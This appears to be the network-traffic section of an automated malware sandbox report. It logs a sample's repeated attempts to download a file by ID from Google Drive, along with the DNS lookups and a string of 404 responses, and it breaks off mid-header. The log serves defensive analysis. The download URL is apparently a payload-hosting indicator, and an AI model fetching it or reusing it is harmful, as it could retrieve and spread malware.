      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQXUdQ-gSJtroZqw5zw6RaJ4OchFfrKYDwi5vJjFD6OF2m8DHNJH0_2GPXoIOxNGpYYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:31 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-a15_tYGTfByt35S0CAjxlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerSet-Cookie: 
NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA; expires=Sun, 13-Jul-2025 02:52:31 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC49DtT0F5CMiwKmH3o6B4pfBMElBHuGUKMjjyPhhOHQO_aeDiyjQOwWZwEEdbYyIRIvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-oWpfUiVCRk5qqBgeCySB0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTbs1P9oRgujbOEyJ3yx0iW3l913ZP37ugmvoLSTeUuYUTdGSfrEsqF5tVok1XkqdRPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:36 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-W0pOL_5HAhjlq32MQY2aFw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSGhacbtpB3ODSnNKll6IKbOlCgw_V5bboHw9rAYJI8PoOsLEy-fe6Yc6vZXFZTJK9HNYyDZ40Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-woyzqQFrcQnuiPGGGptLZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6KCOiy9RgdqzvIzD9vNkapPiokd7Z8kQibYYOHk8djs0BqkkEy46z0qDNanPr4DWBUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:40 GMTContent-Security-Policy: script-src 'nonce-y1hjgZyHL2DExuSUYHqAzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgStLaXLA5F7jhOZoBjqve3Ri0jfMLb8sp5dm8vLPm9bhuQagsGQjc0H6Po-lVBYacKMvo6dypkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:42 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-h03F0nUFcjZD2fa8L9J-CQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQla8hEoLIPGTXtf1KCnznk0msrobAKyzJL8Wc-EpU1Y38sm-fRc5Vr1DIQUcq6ISJ-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:45 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-ehqt-zmHN5zrtQqTbCQ9hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgR5zaczAEHKGYUdK-yO54xlSgj-yZBID855b95pOWM9xCHc13xYaF76dvWV_Y6KJrM7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-76epgjJ0rDguqb2wlieR3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRuUbV_aVg_Sd2zOcCY5b2hf0QFmeJwt6IqUH4VPI8uH7bwDS9NzfL6XL2VUJV16PYGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:49 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-fiMcf5HKxjiMN9Nm3BCX6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS65sHIKteAQRJ9OuA9iCRFVPNjinmraY1sYJfxIvygLGfD4ACUn8m9cnAQyZywgqkXtI_VfTIContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:52 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-Lv-tBs9R5wuFPTI0SI8jdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTrwjeKfxunfcpJKaKrbIAiGW4P1Ljr7ZJ7mQE08XtZhiDlTxy0WkAeWLnpEQgqPgdHx3RnLrMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:54 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zhkJkVePQUqbc-5bLKhEFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTaVSKliE-r_PVyofyaT3dnLYDHJSjWltWiBw5NU6NOgUV0Cs9ExVEHXHSxv9PUfiUTl04AoOUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:56 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-ecgEKlSzv5X6Zq2E2r8-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTtRmWoVRiINegPT1bfoYCWxBsFNdGTjoEKLeQodStgP6VJt-YkMw_H-7phXwDvVPP0bJsrDF8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:52:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ljTAyChWnrLer8c8jch8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRG8WkLb31Ut1ucvbr2b6uOvIsSfcQbaPVd9cSsYTzu6E44pj48xNhOmjYJafErMSkZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:01 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-EcPLHr66Dt5TCYJ6lXLqQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com 